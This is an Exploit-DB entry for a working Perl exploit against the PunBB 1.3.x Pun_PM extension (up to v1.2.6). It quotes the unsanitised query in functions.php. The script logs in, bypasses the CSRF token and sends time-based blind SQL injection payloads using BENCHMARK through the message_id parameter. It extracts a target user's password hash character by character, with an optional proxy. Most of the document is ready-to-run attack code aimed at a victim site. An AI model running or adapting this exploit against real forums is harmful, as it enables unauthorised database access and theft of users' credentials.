PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection

EDB-ID:

14483

CVE:


EDB Verified:

Author:

Dante90

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-07-27

Vulnerable App: 
#!/usr/bin/perl
# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: 2009.07.30 after 0 days the bug was discovered.
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
#               Chuzz, init, plucky, SaRtE, Lupo
# Thanks For Testing: BlAcK HaT, l3d
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# Unit-X Project: www.unitx.net
# ----
# Why I've decided to publish this?
# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
# ----
# DETAILS
# ./PunBB v1.3.*/extensions/pun_pm/functions.php
# LINES: 504 -> 526
#	function pun_pm_edit_message()
#	{
#		global $forum_db, $forum_user, $lang_pun_pm;
#
#		$errors = array();
#
#		// Verify input data
#		$query = array(
#			'SELECT'	=> 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
#			'FROM'		=> 'pun_pm_messages m',
#			'JOINS'		=> array(
#				array(
#					'LEFT JOIN'		=> 'users AS u',
#					'ON'			=> '(u.id = m.receiver_id)'
#				),
#			),
#			'WHERE'		=> 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
#		);
#
#		($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#
#		$result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

my ($UserName,$PassWord,$ID) = @ARGV;
if (@ARGV < 3) {
	&usage();
	exit();
}

my $Message = "";
my $Hash = "";
my ($Time,$Time_Start,$Time_End,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(GET => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
			agent => 'Mozilla/5.0',
			max_redirect => 0,
			cookie_jar => $Cookies,
		) or die $!;
my $Referrer = "http://www.warwolfz.org/";
my $DefaultTime = request($Referrer);

sub request {
	$Referrer = $_[0];
	$Method->referrer($Referrer);
	$Start = Time::HiRes::time();
	$Response = $HTTP->request($Method);
	$Response->is_success() or die "$Host : ", $Response->message,"\n";
	$End = Time::HiRes::time();
	$Time = $End - $Start;
	return $Time;
}

sub Blind_SQL_Jnjection {
	my ($dec,$hex) = @_;
	return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}

sub Clear() {
	my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
	return system($launch);
}

sub Login() {
	if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
		$Cookies->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!;
	}
	my $Get = $HTTP->get($Host.'login.php');
	my $csrf_token = "";
	if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
		$csrf_token = $1;
	}
	my $Login = $HTTP->post($Host.'login.php',
				[
					form_sent		=> '1',
					redirect_url	=> $Host.'login.php',
					csrf_token		=> $csrf_token,
					req_username	=> $UserName,
					req_password	=> $PassWord,
					save_pass		=> '1',
					login => 'Login',
				]) || die $!;

	if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
		return 1;
	} else {
		return 0;
	}
}

sub usage {
	Clear();
	{
		print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
		print " ------------------------------------------------------ \n";
		print " * USAGE:                                             *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
		print " * perl name_exploit.pl [username] [password] [id]    *\n";
		print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";
		print " ------------------------------------------------------ \n";
		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
		print " ------------------------------------------------------ \n";
	};
	exit;
}

sub refresh {
	Clear();
	{
		print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
		print " ------------------------------------------------------ \n";
		print " * USAGE:                                             *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
		print " * perl name_exploit.pl [username] [password] [id]    *\n";
		print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";
		print " ------------------------------------------------------ \n";
		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
		print " ------------------------------------------------------ \n";
	};
	print $_[0] ."\n";
	print " * Victime Site: " . $_[1] . "\n";
	print " * Default Time: " . $_[2] . " seconds\n";
	print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
	print " * BruteForcing N Char Hash: " . $_[6] . "\n";
	print " * SQL Time: " . $_[5] . " seconds\n";
	print " * Hash: " . $_[4] . "\n";
}

sub Main(){
	if (Login() == 1) {
		$Message = " * Logged in as: ".$UserName;
	} elsif (Login() == 0) {
		$Message = " * Login Failed.";
		refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
		print " * Exploit Failed                                     *\n";
		print " ------------------------------------------------------ \n";
		exit;
	}
	for (my $I=1; $I<=40; $I++) { #N Hash characters
		for (my $J=0; $J<=15; $J++) { #0 -> F
			$Time_Start = time();
			my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
			$Time_End = time();
			$Time = request($Referrer);
			refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
			if ($Time_End - $Time_Start > 6) {
				$Time = request($Referrer);
				refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
				if ($Time_End - $Time_Start > 6) {
					syswrite(STDOUT,chr($chars[$J]));
					$Hash .= chr($chars[$J]);
					$Time = request($Referrer);
					refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
					last;
				}
			}
		}
		if ($I == 1 && length $Hash < 1 && !$Hash) {
			print " * Exploit Failed                                     *\n";
			print " ------------------------------------------------------ \n";
			exit;
		}
		if ($I == 40) {
			print " * Exploit Successfully Executed                      *\n";
			print " ------------------------------------------------------\n ";
			system("pause");
		}
	}
}

Main();

#WaRWolFz Crew
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services